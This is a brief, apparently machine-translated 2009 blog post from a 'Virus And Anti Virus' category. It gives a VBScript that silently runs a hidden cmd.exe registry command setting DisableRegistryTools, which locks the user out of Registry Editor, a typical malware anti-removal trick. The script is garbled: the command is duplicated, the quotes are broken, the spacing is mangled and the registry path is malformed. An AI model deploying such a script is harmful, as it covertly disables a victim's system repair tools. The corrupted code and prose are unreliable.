Sign in Notepad and write the script below:
On Error Resume Next On Error Resume Next CreateObject(”WScript.Shell”).run “cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d “”1” /f”, vbhide CreateObject ( "WScript.Shell"). Run "cmd.exe / c reg add hkcusoftware \ microsoft \ windows \ currentversion \ policies \ system / v disableregistrytools / reg_dword t / d" "1" / f ", vbhide
On Error Resume Next (this command is used in the vb file so that I have the wrong code can next) Save the script in the form of file.vbs, eg disableregedit.vbs
This entry was posted
on Kamis, 05 Maret 2009
at 18.04
and is filed under
Virus And Anti Virus
. You can follow any responses to this entry through the
comments feed
.